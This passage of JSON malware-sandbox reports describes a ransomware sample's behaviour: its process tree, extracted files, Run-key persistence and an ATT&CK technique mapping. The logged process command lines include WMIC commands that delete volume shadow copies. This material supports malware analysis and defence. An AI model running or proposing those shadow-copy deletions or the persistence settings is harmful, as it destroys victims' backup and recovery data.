SETTINGS\"; Key: \"WARNONHTTPSTOHTTPREDIRECT\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-136", "type": 3, "relevance": 3, "name": "Writes registry keys", "description": "\"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")\n \"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\"; Key: \"*SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"085cda53603755dc.exe\" marked \"C:\\91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"085cda53603755dc.exe\" opened \"C:\\91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 188)\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 188)\n \"91c379a9dd3e5bb79d42675d0e101e7d4ee390384fb431d61f61c8c2868e2eb5.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 188)\n \"085cda53603755dc.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 220)\n \"085cda53603755dc.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 220)\n \"085cda53603755dc.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 220)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b
https://hybrid-analysis.com/sample/3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b
Hybrid Analysis - Ransomware
{"size": 201184, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b", "sha256": "3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b", "av_detect": 87, "vx_family": "Ransom.Diavolo.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 13, "total_signatures": 170, "extracted_files": [{"name": "readme.txt", "file_path": "%ALLUSERSPROFILE%\\Microsoft\\readme.txt", "file_size": 1164, "sha256": "946ca299d775712a93ca6d5daf44b96c986385a584001bf40730eebe86df9071", "type_tags": ["text"], "description": "ASCII text, with CRLF line terminators", "runtime_process": "3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe (PID: 5716)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "_GUICtrlMonthCal_SetMaxSelCount.au3", "file_path": "%PROGRAMFILES%\\AutoIt3\\Examples\\Helpfile\\_GUICtrlMonthCal_SetMaxSelCount.au3", "file_size": 1452, "sha256": "9017a4b7d4f49a669c6c4b18e671e5d1cfaf82bd410c83fae6013baa5d0429c1", "type_tags": ["com", "executable"], "description": "DOS executable (COM)", "runtime_process": "3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe (PID: 5716)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "_GUICtrlRebar_DeleteBand.au3", "file_path": "%PROGRAMFILES%\\AutoIt3\\Examples\\Helpfile\\_GUICtrlRebar_DeleteBand.au3", "file_size": 2493, "sha256": "4339cee13271615b032e1040e2e2312e95003de2174f8d46d519d063e838b2d1", "type_tags": ["com", "executable"], "description": "DOS executable (COM)", "runtime_process": "3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe (PID: 5716)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "_GUICtrlTreeView_GetItemParam.au3", "file_path": "%PROGRAMFILES%\\AutoIt3\\Examples\\Helpfile\\_GUICtrlTreeView_GetItemParam.au3", "file_size": 2305, "sha256": "c67dee716fa3f479bd6b07f60d663f8861e3aeefb0fc32fae95634cd6b6ae1e2", "type_tags": ["com", "executable"], "description": "DOS executable (COM)", "runtime_process": "3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe (PID: 5716)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "FontConstants.au3", "file_path": "%PROGRAMFILES%\\AutoIt3\\Include\\FontConstants.au3", "file_size": 4140, "sha256": "7fdde7604c12088ab96628743161459662141028de6de0b6162054b54ed93cb4", "type_tags": ["com", "executable"], "description": "DOS executable (COM)", "runtime_process": "3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe (PID: 5716)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "HncATLExt80.enu", "file_path": "%PROGRAMFILES%\\HNC\\Common80\\HncATLExt80.enu", "file_size": 1369470, "sha256": "b9c20daa26e40acf182f198b93307484dac7cdda247318bb0040b30af9b89bcb", "type_tags": ["ppt", "office"], "description": "DOS executable (COM, 0x8C-variant)", "runtime_process": "3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe (PID: 5716)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dictionary.alcatel-lucent.aaa", "file_path": "%PROGRAMFILES%\\Wireshark\\radius\\dictionary.alcatel-lucent.aaa", "file_size": 3923, "sha256": "edbbd635cb7d2b33cec9dc5cc42f0fbef0e108ab4e4cddf9abc6be88365ef528", "type_tags": ["com", "executable"], "description": "DOS executable (COM)", "runtime_process": "3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe (PID: 5716)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Deup.pdf", "file_path": "%USERPROFILE%\\Downloads\\Deup.pdf", "file_size": 78358, "sha256": "9b949527628bcf3d5e6b08fd6f6e4354e15aed57765087049180bea8f4513dbb", "type_tags": ["com", "executable"], "description": "DOS executable (COM)", "runtime_process": "3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe (PID: 5716)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "OBugJFL1LUBK4T.img", "file_path": "%USERPROFILE%\\Downloads\\OBugJFL1LUBK4T.img", "file_size": 683542, "sha256": "9ebade1260ba62442fbf3a6321f60c2dcba1b81fb82b15c9322a330288672a51", "type_tags": ["com", "executable"], "description": "DOS executable (COM)", "runtime_process": "3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe (PID: 5716)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "nyjZw30AWbZ.txt", "file_path": "%USERPROFILE%\\Downloads\\nyjZw30AWbZ.txt", "file_size": 581142, "sha256": "1489ccf906ba53fbfe23a3e478af5a81b7cd41e2aae01f64e85a38ae094845c8", "type_tags": ["com", "executable"], "description": "DOS executable (COM)", "runtime_process": "3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe (PID: 5716)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dism.log", "file_size": 267071, "sha256": "7e7607d3bdc62c937a3c4861e7e77b2e802c08a52c304af0010d71d7b52d0641", "type_tags": ["text"], "description": "Unicode text, UTF-8 (with BOM) text, with very long lines (312), with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "DISMHOST.EXE.67A69857.bin", "file_size": 82944, "sha256": "ecb636b278261eade712e68ec7d805d20e802628248da872d3d0ada1432ffc11", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 27043)", "14 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 27043)"], "imported_objects": ["39 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 26706)", "18 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 26706)", "17 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 26706)", "1 .RES Files linked with CVTRES.EXE 5.00 (Visual Studio 5) (build: 26715)", "18 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 26715)", "139 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 26715)", "10 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 26715)"], "file_analysis": ["File contains Visual Basic code", "File appears to contain raw COFF/OMF content", "File is the product of a medium codebase (14 files)"], "total_file_compositions_imports": 7}, "processes": [{"uid": "00000000-00005716", "name": "3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe", "normalized_path": "C:\\3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b.exe", "sha256": "3a7d45102776702bd32c65e34071db9403ea1a482c42f7a1a919c5ab6baf096b", "av_label": "Trojan.Filecoder", "av_matched": 17, "av_total": 22}, {"uid": "00000000-00006072", "parentuid": "00000000-00005716", "name": "cmd.exe", "normalized_path": "%WINDIR%\\system32\\cmd.exe", "command_line": "/c %WINDIR%\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{811D04C9-F990-4C02-8965-92303C41B4B4}'\" delete", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00005348", "parentuid": "00000000-00006072", "name": "WMIC.exe", "normalized_path": "%WINDIR%\\System32\\wbem\\WMIC.exe", "command_line": "shadowcopy where \"ID='{811D04C9-F990-4C02-8965-92303C41B4B4}'\" delete", "sha256": "132aa270790f56a7524cab968927ed5e1d91b9a26d4badcb24e450e7decc5f81"}, {"uid": "00000000-00003036", "parentuid": "00000000-00005716", "name": "cmd.exe", "normalized_path": "%WINDIR%\\system32\\cmd.exe", "command_line": "/c %WINDIR%\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{C834C388-0440-474D-A901-7C90101BDD5D}'\" delete", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00004432", "parentuid": "00000000-00003036", "name": "WMIC.exe", "normalized_path": "%WINDIR%\\System32\\wbem\\WMIC.exe", "command_line": "shadowcopy where \"ID='{C834C388-0440-474D-A901-7C90101BDD5D}'\" delete", "sha256": "132aa270790f56a7524cab968927ed5e1d91b9a26d4badcb24e450e7decc5f81"}, {"uid": "00000000-00004464", "parentuid": "00000000-00005716", "name": "cmd.exe", "normalized_path": "%WINDIR%\\system32\\cmd.exe", "command_line": "/c %WINDIR%\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{F679DCA4-5EAD-4496-BC1E-B29364E689CB}'\" delete", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00000848", "parentuid": "00000000-00004464", "name": "WMIC.exe", "normalized_path": "%WINDIR%\\System32\\wbem\\WMIC.exe", "command_line": "shadowcopy where \"ID='{F679DCA4-5EAD-4496-BC1E-B29364E689CB}'\" delete", "sha256": "132aa270790f56a7524cab968927ed5e1d91b9a26d4badcb24e450e7decc5f81"}, {"uid": "00000000-00001580", "parentuid": "00000000-00005716", "name": "cmd.exe", "normalized_path": "%WINDIR%\\system32\\cmd.exe", "command_line": "/c %WINDIR%\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{624B7DE9-0366-4000-A7A1-F693118D743C}'\" delete", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00000312", "parentuid": "00000000-00001580", "name": "WMIC.exe", "normalized_path": "%WINDIR%\\System32\\wbem\\WMIC.exe", "command_line": "shadowcopy where \"ID='{624B7DE9-0366-4000-A7A1-F693118D743C}'\" delete", "sha256": "132aa270790f56a7524cab968927ed5e1d91b9a26d4badcb24e450e7decc5f81"}, {"uid": "00000000-00000860", "parentuid": "00000000-00005716", "name": "cmd.exe", "normalized_path": "%WINDIR%\\system32\\cmd.exe", "command_line": "/c %WINDIR%\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{D707BF07-4FB4-4C8B-AA17-67D2E05FA5FB}'\" delete", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00003424", "parentuid": "00000000-00000860", "name": "WMIC.exe", "normalized_path": "%WINDIR%\\System32\\wbem\\WMIC.exe", "command_line": "shadowcopy where \"ID='{D707BF07-4FB4-4C8B-AA17-67D2E05FA5FB}'\" delete", "sha256": "132aa270790f56a7524cab968927ed5e1d91b9a26d4badcb24e450e7decc5f81"}, {"uid": "00000000-00005880", "parentuid": "00000000-00005716", "name": "cmd.exe", "normalized_path": "%WINDIR%\\system32\\cmd.exe", "command_line": "/c %WINDIR%\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{AA6DA2B9-701C-4383-A7B2-B90DC4AE23E7}'\" delete", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00002948", "parentuid": "00000000-00005880", "name": "WMIC.exe", "normalized_path": "%WINDIR%\\System32\\wbem\\WMIC.exe", "command_line": "shadowcopy where \"ID='{AA6DA2B9-701C-4383-A7B2-B90DC4AE23E7}'\" delete", "sha256": "132aa270790f56a7524cab968927ed5e1d91b9a26d4badcb24e450e7decc5f81"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 14}, {"tactic": "Execution", "technique": "Windows Management Instrumentation", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 2, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 4, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 4, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 6, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Double File Extension", "attck_id": "T1036.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/007", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Windows Credential Manager", "attck_id": "T1555.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555/004", "informative_identifiers_count": 1, "parent": {"technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555"}}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 15}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 2, "informative_identifiers_count": 11}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 2, "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": 